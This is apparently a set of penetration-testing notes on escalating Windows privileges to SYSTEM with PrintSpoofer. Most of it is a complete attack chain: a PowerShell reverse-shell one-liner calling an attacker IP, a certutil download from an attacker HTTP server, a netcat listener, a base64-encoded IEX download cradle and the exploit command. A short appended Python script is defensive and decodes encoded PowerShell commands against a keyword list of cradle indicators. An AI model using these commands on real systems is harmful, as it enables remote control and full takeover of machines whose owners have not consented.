PRIMARY CATEGORY → PRINT SPOOLER SERVICE
Theory
This technique can be used to escalate privileges from LOCAL SERVICE or NETWORK SERVICE to SYSTEM when SeImpersonatePrivilege is enabled in the access token of the current logon session.
Abusing for LPE - Windows
Getting the Reverse Shell Script
Downloading the Code Snippet
curl --silent --location --request GET "https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1" --output rev.ps1
Editing as follows
Code Snippet
$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER_IP>',<LISTENING_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Downloading and Transferring the PrintSpoofer Binary to the Target
Downloading the Binary
curl --silent --location --request GET "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" --output printspooferx64.exe
Transferring the Binary to the Target
- From the Attacker ⚔️
python3 -m http.server <PORT>
- From the Target 🎯
mkdir C:\Windows\Temp\PE
cd C:\Windows\Temp\PE
certutil.exe -urlcache -split -f http://<ATTACKER>:<PORT>/printspooferx64.exe
Setting up an HTTP Server
python3 -m http.server 8080
Setting up a Netcat Listener for the Rev. Shell
nc -nlvp <LISTENING_PORT>
Command Encoding
From the Attacker ⚔️
echo -n "IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>:<PORT>/rev.ps1')" | iconv --from-code UTF-8 --to-code UTF-16LE | base64 -w 0 ; echo
Running the Exploit
From the Target 🎯
.\printspooferx64.exe -c 'powershell.exe -EncodedCommand <BASE64_STRING>'
References
PrintSpoofer - Abusing Impersonation Privilege on Windows 10 and WS 2019
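Added defender-side example, not part of these notes or of the PrintSpoofer project: the string built in the Command Encoding step is plain base64 over UTF-16LE, so a triage script can decode -EncodedCommand arguments straight out of process-creation command lines and flag download cradles like the one above. The sample command lines, the placeholder URL and the keyword list are constructed assumptions.

```python
import base64
import re

# Constructed sample process-creation command lines (not real logs): the cradle
# from the Command Encoding step, a benign encoded command, and an unrelated process.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>:<PORT>/rev.ps1')"
    .encode("utf-16-le")
).decode()
BENIGN_SAMPLE = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
SAMPLE_COMMAND_LINES = [
    f"printspooferx64.exe -c 'powershell.exe -EncodedCommand {ENCODED_SAMPLE}'",
    f"powershell.exe -NoProfile -enc {BENIGN_SAMPLE}",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

# powershell.exe accepts common abbreviations of -EncodedCommand; the trailing
# whitespace keeps -ExecutionPolicy from matching. The base64 alphabet is strict.
ENC_FLAG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")
# Keyword list is an assumption: indicators of an in-memory download cradle.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient")


def decode_encoded_command(command_line):
    """Return the decoded UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Bad padding, non-base64 bytes or odd length: not a PowerShell encoded command.
        return None


def triage(command_line):
    """Classify one command line as no-encoded-command, benign or suspicious."""
    decoded = decode_encoded_command(command_line)
    if decoded is None:
        return "no-encoded-command", None
    lowered = decoded.lower()
    hits = [k for k in SUSPICIOUS if k in lowered]
    return ("suspicious" if hits else "benign"), decoded


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        verdict, decoded = triage(line)
        print(f"{verdict:20} {decoded!r}")
```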